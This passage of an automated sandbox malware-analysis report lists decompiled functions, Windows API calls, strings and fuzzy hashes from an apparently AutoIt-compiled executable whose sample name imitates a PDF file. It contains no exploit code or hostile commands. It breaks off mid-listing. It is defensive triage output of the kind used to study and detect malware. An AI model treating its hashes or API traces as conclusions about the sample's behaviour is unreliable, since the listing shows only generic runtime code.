                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00AE2D09
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B1C68B
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B1C6C4
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B1CAED
                                                                            • Part of subcall function 00AE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE2036,?,00000000,?,?,?,?,00AE16CB,00000000,?), ref: 00AE1B9A
                                                                          • SendMessageW.USER32(?,00001053), ref: 00B1CB2A
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B1CB41
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B1CB57
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B1CB62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          • Opcode ID: 69fae1537e89e096493d99fad504458a85ee3e3f195ed82e55b30eb5a97eba18
                                                                          • Instruction ID: 55b7b825f47dac8a8fa9dbbf7b54e51d11ba21e97fffe71f5ecc899988374799
                                                                          • Opcode Fuzzy Hash: 69fae1537e89e096493d99fad504458a85ee3e3f195ed82e55b30eb5a97eba18
                                                                          • Instruction Fuzzy Hash: 1012AF30644241EFDB11CF24C884BB9BBE5FF45310FA445A9E596DB2A2CB71EC81CB91
                                                                          Function 00B577BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00B577F1
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B578B0
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B578EE
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B57900
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B57946
                                                                          • GetClientRect.USER32(00000000,?), ref: 00B57952
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B57996
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B579A5
                                                                          • GetStockObject.GDI32(00000011), ref: 00B579B5
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B579B9
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B579C9
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B579D2
                                                                          • DeleteDC.GDI32(00000000), ref: 00B579DB
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B57A07
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B57A1E
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B57A59
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B57A6D
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B57A7E
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B57AAE
                                                                          • GetStockObject.GDI32(00000011), ref: 00B57AB9
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B57AC4
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B57ACE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: ef577038f10b91f7e40b646ab704b5f59be54d3cabeaade80405888cc40e4f07
                                                                          • Instruction ID: af521fdefce7d608e4623568f9bf5e8539ab0a1fde3b77c0cf7630fe9ddeac22
                                                                          • Opcode Fuzzy Hash: ef577038f10b91f7e40b646ab704b5f59be54d3cabeaade80405888cc40e4f07
                                                                          • Instruction Fuzzy Hash: 2FA181B1A40219BFEB14DBA5DC4AFAE7BA9EB49710F144154FA14A71E0CBB4AD00CB60
                                                                          Function 00B4AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4AF89
                                                                          • GetDriveTypeW.KERNEL32(?,00B6FAC0,?,\\.\,00B6F910), ref: 00B4B066
                                                                          • SetErrorMode.KERNEL32(00000000,00B6FAC0,?,\\.\,00B6F910), ref: 00B4B1C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: 9d48cc12b17700d4bbdc3d96a2bbe8c035616d4b3d6da4e5d7b8b38bb09e2dd1
                                                                          • Instruction ID: d58ceda50a705dd554ec5f5cb341684e7e782edb78027d6ad4ea74982996fb25
                                                                          • Opcode Fuzzy Hash: 9d48cc12b17700d4bbdc3d96a2bbe8c035616d4b3d6da4e5d7b8b38bb09e2dd1
                                                                          • Instruction Fuzzy Hash: 68518130694345ABCF04DB50CAA2E7D73F1EB54741B2040E5E60AB72A1DB79DF41EB82
                                                                          Function 00AE6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-86951937
                                                                          • Opcode ID: 6a37d43c76317b8cc5140e1f70ab806ef9d048204f812c678933ce5328b16728
                                                                          • Instruction ID: cad6aa7448602a9f816aa932349223fe73b57eac320eadb0492f514eac3ffdbf
                                                                          • Opcode Fuzzy Hash: 6a37d43c76317b8cc5140e1f70ab806ef9d048204f812c678933ce5328b16728
                                                                          • Instruction Fuzzy Hash: DB812B70740285BADB20AF61DD86FBE7BE8EF25740F0444A5FD45AB1D2EB60DE41C2A1
                                                                          Function 00B6AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 00B6AB99
                                                                          • SetTextColor.GDI32(?,?), ref: 00B6AB9D
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B6ABB3
                                                                          • GetSysColor.USER32(0000000F), ref: 00B6ABBE
                                                                          • CreateSolidBrush.GDI32(?), ref: 00B6ABC3
                                                                          • GetSysColor.USER32(00000011), ref: 00B6ABDB
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6ABE9
                                                                          • SelectObject.GDI32(?,00000000), ref: 00B6ABFA
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00B6AC03
                                                                          • SelectObject.GDI32(?,?), ref: 00B6AC10
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6AC2F
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6AC46
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B6AC5B
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6ACA7
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B6ACCE
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00B6ACEC
                                                                          • DrawFocusRect.USER32(?,?), ref: 00B6ACF7
                                                                          • GetSysColor.USER32(00000011), ref: 00B6AD05
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00B6AD0D
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B6AD21
                                                                          • SelectObject.GDI32(?,00B6A869), ref: 00B6AD38
                                                                          • DeleteObject.GDI32(?), ref: 00B6AD43
                                                                          • SelectObject.GDI32(?,?), ref: 00B6AD49
                                                                          • DeleteObject.GDI32(?), ref: 00B6AD4E
                                                                          • SetTextColor.GDI32(?,?), ref: 00B6AD54
                                                                          • SetBkColor.GDI32(?,?), ref: 00B6AD5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: 104d143c0b898e59b4a0cfa75c78f6e93210fc05803aebbf4c4c2af732d59b87
                                                                          • Instruction ID: 608ae1ed445076c3494a7e466e106dfe4a36ab328120be5193ee320f3098ae70
                                                                          • Opcode Fuzzy Hash: 104d143c0b898e59b4a0cfa75c78f6e93210fc05803aebbf4c4c2af732d59b87
                                                                          • Instruction Fuzzy Hash: CE615F71900219AFDF119FA4EC48AAE7BB9FF08320F144165F915BB2E1DAB99D40DF90
                                                                          Function 00B68C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B68D34
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B68D45
                                                                          • CharNextW.USER32(0000014E), ref: 00B68D74
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B68DB5
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B68DCB
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B68DDC
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B68DF9
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B68E45
                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B68E5B
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B68E8C
                                                                          • _memset.LIBCMT ref: 00B68EB1
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B68EFA
                                                                          • _memset.LIBCMT ref: 00B68F59
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B68F83
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B68FDB
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00B69088
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B690AA
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B690F4
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B69121
                                                                          • DrawMenuBar.USER32(?), ref: 00B69130
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B69158
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          • Opcode ID: e65764ac69edfc275633facc79b80ba7c88fa6ff1682e254755c77822d6ea968
                                                                          • Instruction ID: 37d98acc9ceb82c0ff52f5a4ba1b4474606b78ea64f1083e2b92462569db2b74
                                                                          • Opcode Fuzzy Hash: e65764ac69edfc275633facc79b80ba7c88fa6ff1682e254755c77822d6ea968
                                                                          • Instruction Fuzzy Hash: 3FE15070901219ABDF209F54DC88EEE7BF9EF05710F148299F915AB1E0DB788A85DF60
                                                                          Function 00B64B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00B64C51
                                                                          • GetDesktopWindow.USER32 ref: 00B64C66
                                                                          • GetWindowRect.USER32(00000000), ref: 00B64C6D
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B64CCF
                                                                          • DestroyWindow.USER32(?), ref: 00B64CFB
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B64D24
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B64D42
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B64D68
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00B64D7D
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B64D90
                                                                          • IsWindowVisible.USER32(?), ref: 00B64DB0
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B64DCB
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B64DDF
                                                                          • GetWindowRect.USER32(?,?), ref: 00B64DF7
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00B64E1D
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00B64E37
                                                                          • CopyRect.USER32(?,?), ref: 00B64E4E
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00B64EB9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: 673862f1328e7624ae96c5d555ae6b9a6cff30fa9c5de8ebd0cd270223c9ffef
                                                                          • Instruction ID: 22eec5dcb17b97b77cd2b7c786af129106534c6964ff96e18dd1f17e80332d20
                                                                          • Opcode Fuzzy Hash: 673862f1328e7624ae96c5d555ae6b9a6cff30fa9c5de8ebd0cd270223c9ffef
                                                                          • Instruction Fuzzy Hash: 9EB16871608741AFDB04DF25D984B6ABBE4FF88310F00896CF5999B2A1DB75EC04CB91
                                                                          Function 00AE27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE28BC
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00AE28C4
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE28EF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00AE28F7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00AE291C
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AE2939
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AE2949
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AE297C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AE2990
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00AE29AE
                                                                          • GetStockObject.GDI32(00000011), ref: 00AE29CA
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE29D5
                                                                            • Part of subcall function 00AE2344: GetCursorPos.USER32(?), ref: 00AE2357
                                                                            • Part of subcall function 00AE2344: ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00AE1256), ref: 00AE29FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          • Opcode ID: d98ef15934acb159edad8dd3ac71995d3ba3d388443e674763baf685873b56c4
                                                                          • Instruction ID: 01c358df692bbb52af3bce59b2599021fd0728fe722cfdacc73ed6c114c633c9
                                                                          • Opcode Fuzzy Hash: d98ef15934acb159edad8dd3ac71995d3ba3d388443e674763baf685873b56c4
                                                                          • Instruction Fuzzy Hash: 4EB14C71A4024AEFDB14DFA9EC45BAE7BB8FB08314F108129FA16A72D0DB749950CB54
                                                                          Function 00B64069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B640F6
                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B641B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                          • API String ID: 3974292440-719923060
                                                                          • Opcode ID: 229d68207fe17666d2cb5117043b8cb59b94e0d21370aa137cf5e11b98929ae3
                                                                          • Instruction ID: 1709bd2f28095daf4a393dce55804fa3cb3af46c3afba0cdfd4646eaa3e1005d
                                                                          • Opcode Fuzzy Hash: 229d68207fe17666d2cb5117043b8cb59b94e0d21370aa137cf5e11b98929ae3
                                                                          • Instruction Fuzzy Hash: 4EA16B302247419FCB14EF20CA91A6AB7E5EF95314F2449BCB8A69B3D2DB74EC05CB51
                                                                          Function 00B552F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00B55309
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00B55314
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B5531F
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00B5532A
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00B55335
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00B55340
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00B5534B
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00B55356
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00B55361
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00B5536C
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00B55377
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00B55382
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00B5538D
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00B55398
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00B553A3
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00B553AE
                                                                          • GetCursorInfo.USER32(?), ref: 00B553BE
                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00B553E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          • Opcode ID: 61562f42dcc5f7749a43c843cbbc7e5db4241597875576799bc043dde9087085
                                                                          • Instruction ID: 4da55b1343442a8ffb7707cae587ffff2613a0b0b03e2afad92da366dd4783b6
                                                                          • Opcode Fuzzy Hash: 61562f42dcc5f7749a43c843cbbc7e5db4241597875576799bc043dde9087085
                                                                          • Instruction Fuzzy Hash: 39416470E043196ADB209FBA8C4996FFFF8EF51B51F10456FE509E7290DAB8A401CE61
                                                                          Function 00B3AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3AAA5
                                                                          • __swprintf.LIBCMT ref: 00B3AB46
                                                                          • _wcscmp.LIBCMT ref: 00B3AB59
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B3ABAE
                                                                          • _wcscmp.LIBCMT ref: 00B3ABEA
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00B3AC21
                                                                          • GetDlgCtrlID.USER32(?), ref: 00B3AC73
                                                                          • GetWindowRect.USER32(?,?), ref: 00B3ACA9
                                                                          • GetParent.USER32(?), ref: 00B3ACC7
                                                                          • ScreenToClient.USER32(00000000), ref: 00B3ACCE
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3AD48
                                                                          • _wcscmp.LIBCMT ref: 00B3AD5C
